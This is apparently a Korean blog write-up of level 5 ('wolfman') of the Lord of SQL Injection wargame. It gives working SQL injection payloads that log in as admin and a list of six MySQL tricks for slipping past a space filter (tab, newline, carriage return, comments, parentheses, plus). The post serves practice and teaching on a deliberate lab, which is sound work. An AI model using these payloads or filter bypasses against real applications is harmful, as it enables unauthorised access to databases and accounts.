Los wolfman 5번 문제 (rubiya)
2019. 10. 10. 00:05ㆍWargame/Load of SQL injection (rubiya)
이번문제는 id 가 admin 이면 solve 함수가 실행되어 풀리는 문제이다.
이전처럼 or , and 연산자를 활용해 바로 쿼리문을 날려보자.
?pw=%27%20or%20id=%27admin%27%23
이러한 쿼리문을 날렸는데
공백은 쓰지 말라고한다..
저 쿼리문에서
' -> %27
공백 -> %20
%23 -> #
을 의미하는데 모두 url encoding 된 값이다.
그렇다면 %20을 어떻게 해줘야하는데
mysql 에서 공백을 우회하는데에는
1. Tab : %09
- no=1%09or%09id='admin'
2. Line Feed (\n): %0a
- no=1%0aor%0aid='admin'
3. Carrage Return(\r) : %0d
- no=1%0dor%0did='admin'
4. 주석 : /**/
- no=1/**/or/**/id='admin'
5. 괄호 : ()
- no=(1)or(id='admin')
6. 더하기 : +
- no=1+or+id='admin'
이러한 방법들이 있다.
그래서 이 값들을 잘 응용해서 쿼리문을 날려줄 수 있다.
%0a를 %20에 대체해서 넣어주면 아마 풀릴것 같다.
?pw=%27%0aor%0aid=%27admin%27%23
'Wargame > Load of SQL injection (rubiya)' 카테고리의 다른 글
Los orge 7번 문제 (rubiya) (0) | 2019.10.10 |
---|---|
Los darkelf 6번 문제 (rubiya) (0) | 2019.10.10 |
Los orc 4번 문제 (rubiya) (0) | 2019.10.09 |
Los goblin 3번 문제 (rubiya) (0) | 2019.10.09 |
Los cobolt 2번 문제 (rubiya) (0) | 2019.10.09 |